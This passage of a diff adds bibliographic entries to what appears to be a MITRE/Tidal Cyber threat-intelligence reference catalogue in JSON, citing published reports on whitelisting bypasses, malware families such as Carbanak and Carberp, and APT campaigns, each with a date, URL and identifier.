"2017-11-17T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" + ], + "source": "MITRE", + "title": "Bypassing Application Whitelisting By Using dnx.exe" + }, + "related": [], + "uuid": "e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0", + "value": "engima0x3 DNX Bypass" + }, + { + "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.", + "meta": { + "date_accessed": "2017-05-26T00:00:00Z", + "date_published": "2016-11-21T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/" + ], + "source": "MITRE", + "title": "Bypassing Application Whitelisting By Using rcsi.exe" + }, + "related": [], + "uuid": "0b815bd9-6c7f-4bd8-9031-667fa6252f89", + "value": "engima0x3 RCSI Bypass" + }, + { + "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.", + "meta": { + "date_accessed": "2017-05-26T00:00:00Z", + "date_published": "2016-08-15T00:00:00Z", + "refs": [ + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" + ], + "source": "MITRE", + "title": "Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner" + }, + "related": [], + "uuid": "abd5f871-e12e-4355-af72-d4be79cb0291", + "value": "Exploit Monday WinDbg" + }, + { + "description": "Smith, C. (2016, September 13). Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations. Retrieved September 13, 2016.", + "meta": { + "date_accessed": "2016-09-13T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "" + ], + "source": "MITRE", + "title": "Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations" + }, + "related": [], + "uuid": "82a762d0-c59f-456d-a7d3-1cab3fa02526", + "value": "SubTee MSBuild" + }, + { + "description": "Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.", + "meta": { + "date_accessed": "2023-09-18T00:00:00Z", + "date_published": "2023-03-20T00:00:00Z", + "refs": [ + "https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/" + ], + "source": "MITRE", + "title": "Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research" + }, + "related": [], + "uuid": "de50bd67-96bb-537c-b91d-e541a717b7a1", + "value": "Bypassing CloudTrail in AWS Service Catalog" + }, + { + "description": "Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.", + "meta": { + "date_accessed": "2022-03-04T00:00:00Z", + "date_published": "2020-09-06T00:00:00Z", + "refs": [ + "https://o365blog.com/post/mdm" + ], + "source": "MITRE", + "title": "Bypassing conditional access by faking device compliance" + }, + "related": [], + "uuid": "832841a1-92d1-4fcc-90f7-afbabad84aec", + "value": "AADInternals - Conditional Access Bypass" + }, + { + "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2017-08-13T00:00:00Z", + "refs": [ + "https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/" + ], + "source": "MITRE", + "title": "Bypassing Device guard UMCI using CHM – CVE-2017-8625" + }, + "related": [], + "uuid": "d4e4cc8a-3246-463f-ba06-d68459d907d4", + "value": "MsitPros CHM Aug 2017" + }, + { + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "meta": { + "date_accessed": "2017-05-25T00:00:00Z", + "date_published": "2017-03-14T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" + ], + "source": "MITRE", + "title": "Bypassing UAC using App Paths" + }, + "related": [], + "uuid": "2e69a4a7-dc7f-4b7d-99b2-190c60d7efd1", + "value": "enigma0x3 sdclt app paths" + }, + { + "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/" + ], + "source": "MITRE", + "title": "Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams" + }, + "related": [], + "uuid": "b461e226-1317-4ce4-a195-ba4c4957db99", + "value": "MDSec System Calls" + }, + { + "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", + "meta": { + "date_accessed": "2018-08-19T00:00:00Z", + "date_published": "2018-06-12T00:00:00Z", + "refs": [ + "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100" + ], + "source": "MITRE", + "title": "c9b65b764985dfd7a11d3faf599c56b8.exe" + }, + "related": [], + "uuid": "74df644a-06b8-4331-85a3-932358d65b62", + "value": "Hybrid Analysis Icacls1 June 2018" + }, + { + "description": "Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.", + "meta": { + "date_accessed": "2020-11-24T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store" + ], + "source": "MITRE", + "title": "Cached and Stored Credentials Technical Overview" + }, + "related": [], + "uuid": "c949a29b-bb31-4bd7-a967-ddd48c7efb8e", + "value": "Microsoft Credential Manager store" + }, + { + "description": "Microsoft. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2016-08-21T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)" + ], + "source": "MITRE", + "title": "Cached and Stored Credentials Technical Overview" + }, + "related": [], + "uuid": "590ea63f-f800-47e4-8d39-df11a184ba84", + "value": "Microsoft - Cached Creds" + }, + { + "description": "Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.", + "meta": { + "date_accessed": "2021-05-05T00:00:00Z", + "date_published": "2020-08-13T00:00:00Z", + "refs": [ + "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/" + ], + "source": "MITRE, Tidal Cyber", + "title": "CactusPete APT group’s updated Bisonal backdoor" + }, + "related": [], + "uuid": "1c393964-e717-45ad-8eb6-5df5555d3c70", + "value": "Kaspersky CactusPete Aug 2020" + }, + { + "description": "ESET. (2022, March 15). CaddyWiper: New wiper malware discovered in Ukraine. Retrieved March 23, 2022.", + "meta": { + "date_accessed": "2022-03-23T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine" + ], + "source": "MITRE", + "title": "CaddyWiper: New wiper malware discovered in Ukraine" + }, + "related": [], + "uuid": "9fa97444-311f-40c1-8728-c5f91634c750", + "value": "ESET CaddyWiper March 2022" + }, + { + "description": "Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "date_published": "2023-06-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" + ], + "source": "MITRE", + "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor" + }, + "related": [], + "uuid": "7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b", + "value": "Cadet Blizzard emerges as novel threat actor" + }, + { + "description": "Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2022-04-06T00:00:00Z", + "refs": [ + "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/" + ], + "source": "MITRE", + "title": "Cado Discovers Denonia: The First Malware Specifically Targeting Lambda" + }, + "related": [], + "uuid": "584e7ace-ef33-423b-9801-4728a447cb34", + "value": "Cado Security Denonia" + }, + { + "description": "William Turton. (2023, September 13). Caesars Entertainment Paid Millions to Hackers in Attack. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2023-09-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.bloomberg.com/news/articles/2023-09-13/caesars-entertainment-paid-millions-in-ransom-in-recent-attack" + ], + "source": "Tidal Cyber", + "title": "Caesars Entertainment Paid Millions to Hackers in Attack" + }, + "related": [], + "uuid": "6915c003-7c8b-451c-8fb1-3541f00c14fb", + "value": "Caesars Scattered Spider September 13 2023" + }, + { + "description": "Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.", + "meta": { + "date_accessed": "2018-09-07T00:00:00Z", + "date_published": "2018-07-20T00:00:00Z", + "refs": [ + "https://securelist.com/calisto-trojan-for-macos/86543/" + ], + "source": "MITRE", + "title": "Calisto Trojan for macOS" + }, + "related": [], + "uuid": "a292d77b-9150-46ea-b217-f51e091fdb57", + "value": "Securelist Calisto July 2018" + }, + { + "description": "CERT-FR. (2023, October 26). Campagnes d'attaques du mode opératoire APT28 depuis 2021. Retrieved October 26, 2023.", + "meta": { + "date_accessed": "2023-10-26T00:00:00Z", + "date_published": "2023-10-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf" + ], + "source": "Tidal Cyber", + "title": "Campagnes d'attaques du mode opératoire APT28 depuis 2021" + }, + "related": [], + "uuid": "5365ac4c-fbb8-4389-989e-a64cb7693371", + "value": "CERTFR-2023-CTI-009" + }, + { + "description": "FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2017-07-27T00:00:00Z", + "refs": [ + "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do" + ], + "source": "MITRE", + "title": "Campaign Rifle - Andariel, the Maiden of Anguish" + }, + "related": [], + "uuid": "bde61ee9-16f9-4bd9-a847-5cc9df21335c", + "value": "FSI Andariel Campaign Rifle July 2017" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.", + "meta": { + "date_accessed": "2017-03-27T00:00:00Z", + "date_published": "2015-02-01T00:00:00Z", + "refs": [ + "https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/" + ], + "source": "MITRE", + "title": "CARBANAK APT THE GREAT BANK ROBBERY" + }, + "related": [], + "uuid": "053a2bbb-5509-4aba-bbd7-ccc3d8074291", + "value": "KasperskyCarbanak" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.", + "meta": { + "date_accessed": "2018-08-23T00:00:00Z", + "date_published": "2015-02-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "CARBANAK APT THE GREAT BANK ROBBERY" + }, + "related": [], + "uuid": "2f7e77db-fe39-4004-9945-3c8943708494", + "value": "Kaspersky Carbanak" + }, + { + "description": "Griffin, N. (2017, January 17). CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL. Retrieved February 15, 2017.", + "meta": { + "date_accessed": "2017-02-15T00:00:00Z", + "date_published": "2017-01-17T00:00:00Z", + "refs": [ + "https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control" + ], + "source": "MITRE", + "title": "CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL" + }, + "related": [], + "uuid": "3da6084f-5e12-4472-afb9-82efd3e22cf6", + "value": "Forcepoint Carbanak Google C2" + }, + { + "description": "Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020.", + "meta": { + "date_accessed": "2020-07-29T00:00:00Z", + "date_published": "2014-02-27T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp" + ], + "source": "MITRE", + "title": "CARBERP" + }, + "related": [], + "uuid": "069e458f-d780-47f9-8ebe-21b195fe9b33", + "value": "Trend Micro Carberp February 2014" + }, + { + "description": "Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.", + "meta": { + "date_accessed": "2020-07-15T00:00:00Z", + "date_published": "2011-02-28T00:00:00Z", + "refs": [ + "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf" + ], + "source": "MITRE", + "title": "Carberp - a modular information stealing trojan" + }, + "related": [], + "uuid": "8f95d81a-ea8c-44bf-950d-9eb868182d39", + "value": "Prevx Carberp March 2011" + }, + { + "description": "Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.", + "meta": { + "date_accessed": "2020-07-15T00:00:00Z", + "date_published": "2010-10-07T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf" + ], + "source": "MITRE", + "title": "Carberp Under the Hood of Carberp: Malware & Configuration Analysis" + }, + "related": [], + "uuid": "f7af5be2-0cb4-4b41-9d08-2f652b6bac3c", + "value": "Trusteer Carberp October 2010" + }, + { + "description": "ESET. (2017, March 30). Carbon Paper: Peering into Turla’s second stage backdoor. Retrieved November 7, 2018.", + "meta": { + "date_accessed": "2018-11-07T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + ], + "source": "MITRE", + "title": "Carbon Paper: Peering into Turla’s second stage backdoor" + }, + "related": [], + "uuid": "5d2a3a81-e7b7-430d-b748-b773f89d3c77", + "value": "ESET Carbon Mar 2017" + }, + { + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2021-08-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + ], + "source": "MITRE", + "title": "CARBON SPIDER Embraces Big Game Hunting, Part 1" + }, + "related": [], + "uuid": "36f0ddb0-94af-494c-ad10-9d3f75d1d810", + "value": "CrowdStrike Carbon Spider August 2021" + }, + { + "description": "Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.", + "meta": { + "date_accessed": "2018-12-08T00:00:00Z", + "date_published": "2017-04-20T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/" + ], + "source": "MITRE", + "title": "Cardinal RAT Active for Over Two Years" + }, + "related": [], + "uuid": "8d978b94-75c9-46a1-812a-bafe3396eda9", + "value": "PaloAlto CardinalRat Apr 2017" + }, + { + "description": "ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2019-10-03T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" + ], + "source": "MITRE", + "title": "Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico" + }, + "related": [], + "uuid": "a5cb3ee6-9a0b-4e90-bf32-be7177a858b1", + "value": "ESET Casbaneiro Oct 2019" + }, + { + "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2017-04-20T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files" + ], + "source": "MITRE", + "title": "Catalog Files and Digital Signatures" + }, + "related": [], + "uuid": "5b6ae460-a1cf-4afe-a0c8-d6ea24741ebe", + "value": "Microsoft Catalog Files and Signatures April 2017" + }, + { + "description": "Marinho, R. (n.d.). \"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "refs": [ + "https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)" + ], + "source": "MITRE", + "title": "\"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data" + }, + "related": [], + "uuid": "eddd2ea8-89c1-40f9-b6e3-37cbdebd210e", + "value": "Catch All Chrome Extension" + }, + { + "description": "Katz, O. (2020, October 26). Catch Me if You Can—JavaScript Obfuscation. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2020-10-26T00:00:00Z", + "refs": [ + "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation" + ], + "source": "MITRE", + "title": "Catch Me if You Can—JavaScript Obfuscation" + }, + "related": [], + "uuid": "379a177b-0c31-5840-ad54-3fdfc9904a88", + "value": "Akamai JS" + }, + { + "description": "MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.", + "meta": { + "date_accessed": "2019-09-20T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/" + ], + "source": "MITRE", + "title": "Categorisation is not a Security Boundary" + }, + "related": [], + "uuid": "3c320f38-e691-46f7-a20d-58b024ea2fa2", + "value": "Categorisation_not_boundary" + }, + { + "description": "Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020.", + "meta": { + "date_accessed": "2020-05-27T00:00:00Z", + "date_published": "2014-05-13T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/" + ], + "source": "MITRE", + "title": "Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN" + }, + "related": [], + "uuid": "ab669ded-e659-4313-b5ab-8c5362562f39", + "value": "CrowdStrike Flying Kitten" + }, + { + "description": "Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.", + "meta": { + "date_accessed": "2022-01-05T00:00:00Z", + "date_published": "2021-11-04T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery" + ], + "source": "MITRE", + "title": "Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery" + }, + "related": [], + "uuid": "9670da7b-0600-4072-9ecc-65a918b89ac5", + "value": "Telephone Attack Delivery" + }, + { + "description": "Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.", + "meta": { + "date_accessed": "2020-12-14T00:00:00Z", + "date_published": "2020-03-01T00:00:00Z", + "refs": [ + "https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" + ], + "source": "MITRE", + "title": "CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS" + }, + "related": [], + "uuid": "a6ef0302-7bf4-4c5c-a6fc-4bd1c3d67d50", + "value": "Tetra Defense Sodinokibi March 2020" + }, + { + "description": "Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.", + "meta": { + "date_accessed": "2019-07-29T00:00:00Z", + "date_published": "2019-05-17T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/" + ], + "source": "MITRE", + "title": "CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption" + }, + "related": [], + "uuid": "cb9e49fa-253a-447a-9c88-c6e507bae0bb", + "value": "CarbonBlack RobbinHood May 2019" + }, + { + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "meta": { + "date_accessed": "2018-03-09T00:00:00Z", + "date_published": "2017-09-18T00:00:00Z", + "refs": [ + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + ], + "source": "MITRE", + "title": "CCleanup: A Vast Number of Machines at Risk" + }, + "related": [], + "uuid": "f2522cf4-dc65-4dc5-87e3-9e88212fcfe9", + "value": "Talos CCleanup 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Cdb.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/" + ], + "source": "Tidal Cyber", + "title": "Cdb.exe" + }, + "related": [], + "uuid": "e61b035f-6247-47e3-918c-2892815dfddf", + "value": "Cdb.exe - LOLBAS Project" + }, + { + "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2018-07-09T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" + ], + "source": "MITRE", + "title": "Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign" + }, + "related": [], + "uuid": "2c28640d-e4ee-47db-a8f1-b34def7d2e9a", + "value": "ESET PLEAD Malware July 2018" + }, + { + "description": "Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2021-06-17T00:00:00Z", + "refs": [ + "https://posts.specterops.io/certified-pre-owned-d95910965cd2" + ], + "source": "MITRE", + "title": "Certified Pre-Owned" + }, + "related": [], + "uuid": "04e53c69-3f29-4bb4-83c9-ff3a2db1526b", + "value": "Medium Certified Pre Owned" + }, + { + "description": "Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2021-06-22T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf" + ], + "source": "MITRE", + "title": "Certified Pre-Owned - Abusing Active Directory Certificate Services" + }, + "related": [], + "uuid": "73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698", + "value": "SpecterOps Certified Pre Owned" + }, + { + "description": "HarmJ0y et al. (2021, June 9). Certify. Retrieved August 4, 2022.", + "meta": { + "date_accessed": "2022-08-04T00:00:00Z", + "date_published": "2021-06-09T00:00:00Z", + "refs": [ + "https://github.com/GhostPack/Certify/" + ], + "source": "MITRE", + "title": "Certify" + }, + "related": [], + "uuid": "27fce38b-07d6-43ed-a3da-174458c4acbe", + "value": "GitHub Certify" + }, + { + "description": "LOLBAS. (2021, October 7). CertOC.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-10-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/" + ], + "source": "Tidal Cyber", + "title": "CertOC.exe" + }, + "related": [], + "uuid": "b906498e-2773-419b-8c6d-3e974925ac18", + "value": "CertOC.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2020, July 7). CertReq.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-07-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/" + ], + "source": "Tidal Cyber", + "title": "CertReq.exe" + }, + "related": [], + "uuid": "be446484-8ecc-486e-8940-658c147f6978", + "value": "CertReq.exe - LOLBAS Project" + }, + { + "description": "TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2021-04-21T00:00:00Z", + "refs": [ + "https://github.com/TheWover/CertStealer" + ], + "source": "MITRE", + "title": "CertStealer" + }, + "related": [], + "uuid": "da06ce8f-f950-4ae8-a62a-b59b236e91a3", + "value": "GitHub CertStealer" + }, + { + "description": "Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2012-11-14T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc732443.aspx" + ], + "source": "MITRE", + "title": "Certutil" + }, + "related": [], + "uuid": "8d095aeb-c72c-49c1-8482-dbf4ce9203ce", + "value": "TechNet Certutil" + }, + { + "description": "LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/" + ], + "source": "MITRE", + "title": "Certutil.exe" + }, + "related": [], + "uuid": "4c875710-9b5d-47b5-bc9e-69ef95797c8f", + "value": "LOLBAS Certutil" + }, + { + "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2012-12-30T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html" + ], + "source": "MITRE", + "title": "CFR Watering Hole Attack Details" + }, + "related": [], + "uuid": "6108ab77-e4fd-43f2-9d49-8ce9c219ca9c", + "value": "FireEye CFR Watering Hole 2012" + }, + { + "description": "Glyer, C. (2018, April 14). @cglyer Status Update. Retrieved October 11, 2018.", + "meta": { + "date_accessed": "2018-10-11T00:00:00Z", + "date_published": "2018-04-14T00:00:00Z", + "refs": [ + "https://twitter.com/cglyer/status/985311489782374400" + ], + "source": "MITRE", + "title": "@cglyer Status Update" + }, + "related": [], + "uuid": "cfcb0839-0736-489f-9779-72e5c96cce3d", + "value": "Twitter Cglyer Status Update APT3 eml" + }, + { + "description": "Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.", + "meta": { + "date_accessed": "2021-06-30T00:00:00Z", + "date_published": "2020-11-17T00:00:00Z", + "refs": [ + "https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf" + ], + "source": "MITRE", + "title": "CHAES: Novel Malware Targeting Latin American E-Commerce" + }, + "related": [], + "uuid": "aaefa162-82a8-4b6d-b7be-fd31fafd9246", + "value": "Cybereason Chaes Nov 2020" + }, + { + "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.", + "meta": { + "date_accessed": "2020-05-22T00:00:00Z", + "date_published": "2018-02-28T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" + ], + "source": "MITRE", + "title": "Chafer: Latest Attacks Reveal Heightened Ambitions" + }, + "related": [], + "uuid": "3daaa402-5477-4868-b8f1-a2f6e38f04ef", + "value": "Symantec Chafer February 2018" + }, + { + "description": "Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2019-01-30T00:00:00Z", + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/" + ], + "source": "MITRE", + "title": "Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities" + }, + "related": [], + "uuid": "07dfd8e7-4e51-4c6e-a4f6-aaeb74ff8845", + "value": "Securelist Remexi Jan 2019" + }, + { + "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved March 1, 2022.", + "meta": { + "date_accessed": "2022-03-01T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://twitter.com/TheDFIRReport/status/1498657772254240768" + ], + "source": "MITRE", + "title": "\"Change RDP port\" #ContiLeaks" + }, + "related": [], + "uuid": "c0deb077-6c26-52f1-9e7c-d1fb535a02a0", + "value": "change_rdp_port_conti" + }, + { + "description": "Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "refs": [ + "https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea" + ], + "source": "MITRE", + "title": "Change the Normal template (Normal.dotm)" + }, + "related": [], + "uuid": 